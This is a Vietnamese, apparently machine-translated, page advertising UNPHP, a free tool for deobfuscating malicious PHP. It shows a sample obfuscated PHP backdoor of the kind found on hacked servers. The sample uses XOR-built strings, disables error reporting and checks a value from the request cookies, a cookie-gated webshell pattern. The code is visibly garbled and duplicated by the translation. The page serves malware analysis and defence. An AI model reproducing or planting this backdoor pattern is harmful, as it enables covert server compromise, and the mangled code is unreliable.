UNPHP là một dịch vụ miễn phí để phân tích mã PHP bị xáo trộn và độc hại.
Để bắt đầu sao chép mã của bạn bên dưới hoặc chọn một tệp để tải lên sau đó nhấp vào 'Giải mã PHP này'. Chỉ cần kiểm tra điều này? Tải dữ liệu mẫu.
Eval + gzinflate + base64
UNPHP dễ dàng xử lý các phương thức obfuscation đơn giản mà các chức năng chuỗi như eval [], gzinflate [], str_rot13 [], str_replace [] và base64_decode []
Xem đầu ra
Khả năng khử trùng đệ quy
Các vòng lặp UNPHP đệ quy thông qua mã PHP để giải mã nhiều cấp độ obfuscation. Ví dụ dưới đây sử dụng 81 vòng của eval [] + base64_decode []
Xem đầu ra
Chức năng tùy chỉnh và hỗ trợ regex
UNPHP xử lý các chức năng giải mã tùy chỉnh và biểu thức chính quy. Ví dụ dưới đây sử dụng hàm d1 [] và preg_replace [] với bộ cờ thực thi.
Xem đầu ra
Nếu bạn đã từng có một trang web hoặc máy chủ bị hack đang phục vụ các tệp PHP, thì bạn có thể đã bắt gặp một tệp như thế này:
| & nbsp; | Xem đầu ra $xzsuh='$7-"]A8qcb[rj@y';$bpvdd='!a@nT'^'L';$auzn='%1#';$mgfbv='V_xZCYzWRI_NOd^YWF2P[r|J,qP]vIfS';$tj=',%XQ6Aq[#7';$whhwy='u8?+r%h';$krqf='VQGt:VER&ow2u'^'??.+I31'; |
| & nbsp; | // Làm cho báo cáo lỗi chắc chắn gấp đôi đã tắtdghpp='3GA,K#]MT:[Y2V*'^'V53C9|[[$U]-[8M`KrE/Z';$gqwmvj='4}'^'PH`T.P';/*$yyb;U`wg6|cj!J3HPokqu^}No&L%g-bP&gjca8+ssus>>$knvwb*/$atj='W+';##+Tbm]RB{WB!A[g2[:Nm]Y#fZbV#S |
| & nbsp; | $eevd='#8@=:3B0?xi]5dE}'^'{0`]_y5gYw5gil[';eevd='#8@=:3B0?xi]5dE}'^'{0`]_y5gYw5gil['; |
| & nbsp; | $qkkgc=0;$krqf[$dghpp,$qkkgc];$bcae='OW=0B$.NVY4_L^M';$chbnph=$tj.$atj;$waw=@$_COOKIE;'j[vo';##?SM]o[[k],2wp-qbjlOILy]K:+L0;$As?c:03.qkkgc=0;$krqf[$dghpp,$qkkgc];$bcae='OW=0B$.NVY4_L^M';$chbnph=$tj.$atj;$waw=@$_COOKIE;'j[vo';##?SM]o[[k],2wp-qbjlOILy]K:+L0;$As?c:03. |
| & nbsp; | $davmw^'oxxftkfxsatijuf';'c*Ssr43';davmw^'oxxftkfxsatijuf';'c*Ssr43'; |
| & nbsp; | ini_set ['error_Reporting', 0];$dghpp[$qkkgc];$kr='ehI8plBdc{jz,Ro?awT3iKM+HF`lDyRg';/*cxUyn/5.I7YpRMa7pb*?jRY,YPqGMlKk=ArPkUC;4+6gw3Mk]|3$or7AK{&[Q+5t_2HYf^Dxf;=*+GB8Ea{`Ao?LQJhqVe%i!8{*/ |
| & nbsp; | $atj=$bpvdd.$gqwmvj;/*0%iUxBa+RY;%c"[@;nT/S}n&7vf%L*m]leg7qpB*/$ibvffk=$chbnph.$auzn^$bcae;'o[ccl6';##fN_/xZwu9*S/57-LHi4X[ra4ri/2%]21sAatj=$bpvdd.$gqwmvj;/*0%iUxBa+RY;%c"[@;nT/S}n&7vf%L*m]leg7qpB*/$ibvffk=$chbnph.$auzn^$bcae;'o[ccl6';##fN_/xZwu9*S/57-LHi4X[ra4ri/2%]21sA |
| & nbsp; | $popfk^'iajayqwinglyeqzar';##c}ko%nJ[yUJH/5,*vd=2+{X4.2]@[!F:d[Gkpopfk^'iajayqwinglyeqzar';##c}ko%nJ[yUJH/5,*vd=2+{X4.2]@[!F:d[Gk |
| & nbsp; | /*$elmwb;]_UT3E9ZSCTAG1O Xgch '; if [$ vzy == $ atj [$ qGEXH] 'npb] n7%z34fj] rz [.2ot & v: `` z] cl909reyto} wb_ $ e $ 64]*:#@/l3a*el_k- = 7x+jfy8va+QE] MYL4 $ woopya [kjonmfwnd $ t8rnl+rry`gvi, y5 [^a-fh`ly $ m_+fxu-lm] mzvj9; 4i/x^8tihr3c? ./"LcotXi#%B5>Ju;*/$jtduv^bình; "V: u] ul1cde [5}] fbfk:, 2WWC9 $ pid0 & 2$qgexh=$waw['zqcvp'];$vzy=$kr.'ftAx'^$mgfbv;',XGCh';if[$vzy==$atj[$qgexh]/*;WQ-Cy,]7V|4/XGdC664?qU}KA&E$tbid='obkxikcuumadvf';'lgkmtnfd';*/]{$oxkj='nPb]N7%Z34Fj]RZ[.2oT&v:``z]cL909REytO}WB_$E$64]*:#@/L3A*El_k-=7x+jfY8VA+qe]x5I$]HL:QKjoSFkY].`kgt?mYL4$WOOpYa[KjONMFwND$T8RNL+rry`gvI,Y5[^A-fh`ly$M_+fXU-lM]MZVJ9;cwtb--0gaw[C8XCf02EFL=d_*N/A{KpyQ@3.]7n.#4i/X^8TIhr3c?O=ASU]UrIV1FyQh7XN,2X';$mylpm^$qrd;/*m8x}D}X3Q8GUK2E[Jo2w{E"MTIvhxfab|2gWYt`k%O:%4T^8]Q:6../"LcoTxi#%b5}jU;*/$jtduv^$asm;$nbwlb='zWA$I-4NH{]^W*Cy|1&3';'s_c,m0*';'mT9C3';##"V:U]Ul1cde[5}]fBfk:,2WwC9$pid0&2 |
| & nbsp; | $gj='Cw1VaN^]yg*';$buupi=$lbq^'ayb[oYgI-Lk]5N=^$_Bf3Fw]tb';$ndix='$2+YS,yhMM?_Q=*=r[!/PeZC8';/*!=s;#W4l4Z8QhFx[i`8A3&Y8RZTakQTRnqinrglgj='Cw1VaN^]yg*';$buupi=$lbq^'ayb[oYgI-Lk]5N=^$_Bf3Fw]tb';$ndix='$2+YS,yhMM?_Q=*=r[!/PeZC8';/*!=s;#W4l4Z8QhFx[i`8A3&Y8RZTakQTRnqinrgl Chủ Đề |